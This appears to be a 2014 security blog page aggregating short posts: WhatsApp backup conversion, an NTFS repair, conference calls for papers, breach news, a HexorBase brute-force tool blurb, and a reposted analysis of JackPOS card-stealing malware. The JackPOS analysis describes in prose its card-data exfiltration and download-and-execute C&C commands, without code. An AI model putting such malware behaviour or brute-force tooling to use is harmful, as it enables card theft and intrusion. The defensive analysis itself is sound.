How To Convert Whatsapp Database Crypt5 To Crypt7

Whatsapp is a popular messaging app used by millions of users worldwide. It is the most dominant messaging app available today for smartphones. Everyday we send and receive hundreds of messages on Whatsapp which is automatically saved by the app everyday 4:00 AM on sdcard as chat history backup file. The chat history backup file has an extension of either .crypt5 or .crypt7. Crypt7 is the newest file extension for the chat history database file. In this tutorial I am going to teach you how you can convert an older crypt5 Whatsapp database to newer crypt7 database. 

 A crypt5 chat history backup file can not be restored to newer version of Whatsapp which makes crypt7 format. I discovered this problem when I was trying to restore crypt5 chat history from an older android phone to newer one which only supported crypt7 format. Finally the conversation was not restored on the new android phone. So I found a way and converted the crypt5 database to crypt7 format. After this conversion all the chat history was successfully restored on the new phone.

Pre-Requisites

  • Your old android phone’s Whatsapp should have all the chat history visible within the app. So that you can take a backup.
  • If you have accidently deleted the chats then you must have the chat history backup file. It can be found in ‘sdcard>Whatsapp>Databases’
  • If step 2 is your problem then copy the database file to some other folder on your sdcard and uninstall Whatsapp. Now make a folder directory on sdcard like ‘Whatsapp>Databases’ and place the chat history backup file in this folder and read Restore messages on Whatsapp.
  • Now you have restored the chat history and chats are again visible in Whatsapp.
  • Skip steps 2 and 3 if you fulfill step 1.

Convert Whatsapp Database Crypt5 To Crypt 7

  • Now on your older android smartphone download and install the latest version of Whatsapp. 
  • After updating the app, backup chat history by going to ‘Settings>Chat settings>Backup conversations’. The database will be saved in crypt7 as msgstore.db.crypt7 format on your older phone’s sdcard.
  • On your new android phone download and install the latest version of Whatsapp and place the old phone’s chat history backup file in ‘Whatsapp>Databases’ on new phone and open it.
  • Now follow the app's instructions. Enter the same mobile number and do not use a new one. After few seconds you will see a page in which whatsapp will ask you to restore your messages. See the image below. Click the "Restore" button.

crypt5 to crypt7

  • Now your messages are restored and can be easily seen within whatsapp.
You have successfully converted Whatsapp database crypt5 to crypt7 format and restored the chat history from old phone to new phone without using additional android apps. This trick will work for converting crypt, crypt3, crypt5 to crypt7. - See more at: http://www.pcnexus.net/2014/05/how-to-convert-whatsapp-database-crypt5-to-crypt7.html#sthash.pdpa9lXg.dpuf

 Font:  PCnexus.net 
, , ,

WazzapMigrator Crypt7 whatsapp

WazzapMigrator

Crypt7 decryption

Date: 
21.05.2014
Added some additional info about the new Android archive crypt7 (msgstore.db.crypt7) encryption. Shortly, you have three ways to get down to this:
  1. import your iPhone's messages only by NOT ticking "Merge Android archive" (99% of the cases when you will be using Whatsappmigrator, as you just bought a brand new Android device)
  2. OR just email your pre-existing conversations directly from Whatsapp in order to store them for future reference (from Whatsapp:Settings -> Chat settings -> Email conversation)
  3. OR root your Android device then use WhatsApp Tri-Crypt (free on Play Store) to decrypt the msgstore.db.crypt7. Rooting is a very technical procedure whose aim is to gain full administrative access to your device. If you want more info you can take a look here or here (please note: those links are not supported by Whatsappmigrator in any way, they're provided for your reference only).
TECHNICAL DETAILS: This is due to Whatsapp recently changing its encryption from .crypt to .crypt5 to .crypt6 to .crypt7 (in just 2 months!!). Until .crypt5 it was possibile to decrypt without much hassle, but with .crypt6 and .crypt7 they had the idea of periodically changing the decryption key plus storing it in a private area of your phone, therefore not accessible without root access.
 Whatsapp - Send conversations by email Whatsapp - Send conversations by email - Part 2

terça-feira, julho 01, 2014

, ,

Falha montagem HD Externo - NTFS

Caros; Boa Noite. (:


- Hoje me deparei com outra situação inusitada  tentando acessar um HD externo,ele me mostrou seguinte erro:

Failed to mount '/dev/sdc1': Input/output error NTFS is either inconsistent, or there is a hardware fault, or it's a SoftRAID/FakeRAID hardware. In the first case run chkdsk /f on Windows then reboot into Windows twice. The usage of the /f parameter is very important! If the device is a SoftRAID/FakeRAID then first activate it and mount a different device under the /dev/mapper/ directory, (e.g. /dev/mapper/nvidia_eahaabcc1). Please see the 'dmraid' documentation for more details.

- Então ele me apresentou que /dev/sdc1 não foi possível realizar a montagem da partição, e citou algumas recomendações como realizar comando chkdsk /f ( windows ) para corrigir a montagem. Como estou utilizando linux realizei os seguintes procedimentos:

-Instale: NTFS-3G + Ntfsprogs.Vamos utilizar alguns recursos disponíveis neste pacote como: ntfsfix (: Segue o man :


------------------------------------------------------------ Inicio
NAME
       ntfsfix - fix common errors and force Windows to check NTFS

SYNOPSIS
       ntfsfix [options] device

DESCRIPTION
       ntfsfix  is  a  utility that fixes some common NTFS problems.  ntfsfix is NOT a Linux version of chkdsk.  It only repairs some fundamental NTFS inconsisten‐ cies, resets the NTFS journal file and schedules an NTFS consistency check for the first boot into Windows.You may run ntfsfix on an NTFS volume if you think it was damaged by Windows or some other way and it cannot be mounted.

OPTIONS
       Below is a summary of all the options that ntfsfix accepts.  Nearly all options have two equivalent names.  The short name is preceded by  -  and  the  long
       name  is  preceded  by --.  Any single letter options, that don't take an argument, can be combined into a single command, e.g.  -fv is equivalent to -f -v.
       Long named options can be abbreviated to any unique prefix of their name.

       -b, --clear-bad-sectors
              Clear the list of bad sectors. This is useful after cloning an old disk with bad sectors to a new disk.

       -d, --clear-dirty
              Clear the volume dirty flag if the volume can be fixed and mounted.  If the option is not present or the volume cannot be  fixed,  the  dirty  volume
              flag is set to request a volume checking at next mount.

       -h, --help
              Show a list of options with a brief description of each one.

       -n, --no-action
              Do not write anything, just show what would have been done.

       -V, --version
              Show the version number, copyright and license

BUGS
 There are no known problems with ntfsfix.  If you find a bug please send an email describing the problem to the development team: ntfs-3g-devel@lists.sf.net

AUTHORS
       ntfsfix was written by Anton Altaparmakov, with contributions from Szabolcs Szakacsits.  It was ported to ntfs-3g by Erik Larsson and Jean-Pierre Andre.

AVAILABILITY
       ntfsfix is part of the ntfs-3g package and is available from:
       http://www.tuxera.com/community/

SEE ALSO
       mkntfs(8), ntfsprogs(8)

------------------------------------------------------------ Fim.

então para corrigir use o comando :  sudo ntfsfix /dev/sdc1  
..... e problema Resolvido. (:



terça-feira, junho 24, 2014

, , ,

Android KeyStore Stack Buffer Overflow (CVE-2014-3100)

Segue um buffer overflow baseado em pilha no Android Serviço KeyStore que afeta Android 4.3 e abaixo. A questão foi  corrigida no Android 4.4.

A vulnerabilidade é identificada como CVE-2014-3100, Mais detalhes estão disponíveis em:
1 Blog Post:. http://ibm.co/1pbk4yH
,

Ekoparty 10 Call For Papers


CALL FOR PAPERS
Call For Papers for the 10th edition of the Ekoparty Security Conference
 and Training being held from October 29th through the 31st, 2014 in 
Latin America.
We are really proud to announce the tenth edition of the ekoparty security
conference!

This year it's going to be special as we are celebrating #eko10 We are
having new awesome location, ekoCAMP for sleep over and night activities, a
bigger after party and many more special things.

ekoparty has become the most important technical conference in Latin
America, which keeps offering the deepest knowledges in the field. We are
expecting to bring together more than 3000 security specialists! If you
have something to share THIS is the right conference, you'll regret not to
be here this year.

During the 3-day high voltage lectures, you also can enjoy activities like
our famous LOCKPICKING VILLAGE, the WIFI ATTACK LABORATORY, a WARDRIVING
around the City, free WORKSHOPS, the most important CAPTURE THE FLAG in
Latin America, not forgetting of course, our amazing parties! Also new in
this #eko10:

The cfp system is online at https://cfp.ekoparty.org
* ekoCAMP: three days of high voltage lectures is not enough? only for this
tenth edition, you can camp at ekoparty! Stay all night playing the CTF!
* ekoparty will recognize the trajectory of Latin American researchers, as
also their greatest researches. Stay tuned!
The ekoparty organization team is kindly inviting anyone who is interested
in showing and sharing his researches and/or developments in the field of
Information Security.

LECTURE TOPICS
Topics of interest include, but are not limited to, the following:

- 0 days
- Satellite Hacking
- Web Security
- Privacy
- Embedded Systems Technologies
- GSM, GPRS and CDMA Security
- RFID Security
- VoIP Security
- Lockpicking
- Wireless Security
- Exploitation
- IPv6 Security
- Attack and Defense Techniques
- Reverse Engineering
- Application Security, Testing, Fuzzing
- Code Auditing
- Virtualization Security
- Malicious Code
- Databases Security
- Packet Pungas
- Viruses, Worms, and Trojans
- e-crime, Phishing and Botnets
- Malware, Crimeware
- NSA’s Baby shower.
- Banking Security
- Phreaking
- Unit 61398 Asado techniques
- Hardware hacking
- Cryptography
- Forensics & AntiForensics
* All the lectures are going to be simultaneously translated breaking any
language barrier.


>SUBMISSION TYPES:
Full length talks (50 minutes)
Turbo talks (20 minutes)
Hands-on Workshops (120 minutes)
Trainings (1 or 2 days)
Night activities
Geek games
* Speakers including a Hands-on Workshop proposal earn extra points in the
CFP.


>IMPORTANT DATES:
Jun 18 - CFP is Open
Jul 31 - First round of selection
Aug 29 - CFP is Closed
October 27 & 28 - ekoparty trainings
October 29, 30 & 31 - ekoparty security conference


>SPEAKER PRIVILEGES:
Round-trip airfare ticket
Accommodation
ekoparty's ASADO (BBQ)
Extra ticket to the conference


>TRAINER PRIVILEGES:
50% net profit of the Training
3 days accommodation
ekoparty's ASADO (BBQ)
Ticket to the conference

>EXTRA ACTIVITIES:
- We are looking for new activities to be performed in parallel to the
conference and although during ekoCAMP at night. Send us your proposal to:
organizacion@ekoparty.org


font: http://packetstorm.igor.onlinedirect.bg/papers/call_for/ekoparty10-cfp.txt
,

Askmen.com Website Allegedly Compromised Through Code Injection


Title: Askmen.com Website Allegedly Compromised Through Code Injection
Source: Ionut Ilascu, Softpedia
Date Published: 23 June 2014

Excerpt:
"The portal is dedicated to providing news for men from domains
ranging from sports and health to social activity and entertainment.
According to their media page, there are more than 14 million readers
in U.S. alone, but the portal also has localized versions for UK,
Canada, Australia and the Middle East.
...
According to Websense, the landing page with the exploit is generated
automatically using a domain generation algorithm (DGA) that has been
cracked by the researchers, who also revealed the pages that would be
accessed until June 30."
Font: http://news.softpedia.com/news/Askmen-com-Website-Allegedly-Compromised-Through-Code-Injection-448032.shtml
, ,

AppSecEU 2014 live streaming


OWASP AppSec Europe 2014 will be presenting six (6) tracks of live content directly from the conference's main rooms. Event will start on June 25 and June 26 at 9:15AM GMT+1. And if you miss it, keep calm and watch later on since all the recorded content will be available into the following playlist:

Check out the official OWASP YouTube channel for live events notifications
This has been made possible by the AppSecEU 2014 Conference Team, | OWASP Media Project and Münster University of Applied Sciences IT Security Lab.
, , ,

JackPOS - Another Credit Card Stealer


In a previous blog post on Dexter, we briefly mentioned a new strain of point-of sale (PoS) malware that has compromised over 4,500 credit cards in the United States and Canada. This new strain of malware, dubbed JackPOS, was detected early this year and between then and the time of writing, has had just one version, but with multiple variants.
In this blog post, we look briefly at the unique attributes of JackPOS: its custom pattern matching and its command-and-control (C&C) communication. We will conclude with quick remarks on the newest variant that was found in April.

Custom Pattern Matching

As we now know, POS malware will first dump the process memory, extract the Track 1 and/or Track 2 data information, and finally exfiltrate the stolen information to a C&C server. PoS malware can extract track data using one of two approaches: pattern matching or regular expression matching.
Custom pattern matching provides the malware authors with more control as to which type of cards to target or filter out. JackPOS’s custom pattern matching is unique as it is more specific compared to other families such as Dexter. JackPOS will only grab credit cards from specific credit card issuers. This is done by checking parts of the Issuer Identification Number (IIN), which consists of the first few digits of the Primary Account Number (PAN).
The table below shows the first digits of the IINs that JackPOS checks for, and the corresponding credit card companies.
JackPOS Table 1
Table 1. Targetted IINs and credit card companies.

C&C Communication

JackPOS makes an HTTP GET request to the hardcoded URL http://[REMOVED]/post/echo, checking for the response "up". After ensuring that the server is up and running, the infected machine registers itself with the C&C through HTTP on TCP port 80 using the standard WinINet APIs: InternetOpenW, InternetConnectW, HttpOpenRequestW, and HttpSendRequestW.
The table below shows these APIs and the parameters used.
JackPOS Table 2
Table 2. The WinINet APIs and parameters.
The content of the HTTP field-value pairs are described below.
JackPOS Table 3
Table 3. The HTTP field-value pairs.
The figure below shows an example of credit card information being exfiltrated to the C&C server. As we can see, the Track 1 and Track 2 data are simply encoded with the Base64 algorithm.
JackPOS Fig 1
Figure 1. Credit card information being exfiltrated by JackPOS.

The C&C Server Commands

The response from the C&C server can be one of three commands:
1) "update" : download and update • Connects to http://{Removed}/post/download and downloads a file to the user's Application Data folder. The filename used is selected from a list of strings that are in the malware body.
JackPOS Fig 2
Figure 2. List of filenames in the malware body.
• Updates the autorun registry entries to point to the updated file.
2) "exec" : download and execute. There is one parameter used in this command, which is the URL from which the malware will be downloaded. • Saves the executable to %Temp%\[filename].exe, then executes it. 3) "kill" • Deletes all registry entries associated with the malware. • Kills the malware process.

New Variant

In April, we acquired what appeared to be a new variant of JackPOS. After completing our analysis, we concluded that the sample from April varies only slightly from the original version. As we like to say, it is ‘old water with a new bottle’. The only significant difference is the fact that the April version is packed with a custom packing algorithm.
It is interesting to note that the strings showing the compilation path of the malware in this April version have been modified from the February versions:
1) February version • C:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\sop.pdbC:\Users\ziedpirate.ziedpirate-PC\Desktop\sop\sop\Release\svchost.pdb
2) April version • I:\hack\dev\pos\sop\Release\sop.pdbI:\hack\dev\pos\sop\Release\svhost.pdb
As we can see, the PDB strings in the February version had revealed the Windows user account name of the malware author. From the change in these strings, we can consider two possibilities: either (1) the project was moved and recompiled in an effort to correct this; or (2) the project source code is now in the hands of other malware authors.
font: https://blog.fortinet.com/JackPOS-----Another-Credit-Card-Stealer/ 
, ,

HexorBase Audit Toolbox


"HexorBase is a database application designed for administering and auditing multiple database servers simultaneously from a centralized location, it is capable of performing SQL queries and bruteforce attacks against common database servers (MySQL, SQLite, Microsoft SQL Server, Oracle, PostgreSQL ).HexorBase allows packet routing through proxies or even metasploit pivoting antics to communicate with remotely inaccessible servers which are hidden within local subnets.

It works on Linux and Windows ...
To install simply run the following command in terminal after changing
directory to the path were the downloaded package is:
root@host:~# dpkg -i hexorbase_1.0_all.deb"
Download: https://code.google.com/p/hexorbase/downloads/list

HITBSecConf2014 - Malaysia \o/

Topics:

Topics of interest include, but are not limited to the following:
  • Cloud Security
  • File System Security
  • 3G/4G/WIMAX Security
  • SS7/GSM/VoIP Security
  • Security of Medical Devices
  • Critical Infrastructure Security
  • Smartphone / MobileSecurity
  • Smart Card and Physical Security
  • Network Protocols, Analysis and Attacks
  • Applications of Cryptographic Techniques
  • Side Channel Analysis of Hardware Devices
  • Analysis of Malicious Code / Viruses / Malware
  • Data Recovery, Forensics and Incident Response
  • Hardware based attacks and reverse engineering
  • Windows / Linux / OS X / *NIX Security Vulnerabilities
  • Next Generation Exploit and Exploit Mitigation Techniques
  • NFC, WLAN, GPS, HAM Radio, Satellite, RFID and Bluetooth Security

White Paper:

If your presentation is short listed for inclusion into the conference program, a technical white paper must also be provided for review (3000 - 5000 words).

Please note:

We do not accept product or vendor related pitches. If you would like to showcase your company's products or technology, please email conferenceinfo@hackinthebox.org

http://conference.hitb.org/hitbsecconf2014kul/
 
, ,

Want to know the WIFI password for the Brasil World Cup security center?

World Cup WiFi Password

By William Knowles
Senior Editor
InfoSec News
June 24, 2014
The Jerusalem Post is reporting that the Rishon Lezion based security company RISCO Group is providing security management at the soccer stadium in Cuiaba, Brazil.
The state-of-the-art 41,000-seat Arena Pantanal, which cost $537 million to build, is one of the 12 host venues for the World Cup.
The project includes coordinating hundreds of Internet- protocol security cameras deployed in the stadium and its surroundings, lighting systems, gates and the PA system through a command and control center.
Three games have so far been played there in the tournament, all without incident.
…except for posting the WiFi code in a Twitter photo.
Assinar: Postagens (Atom)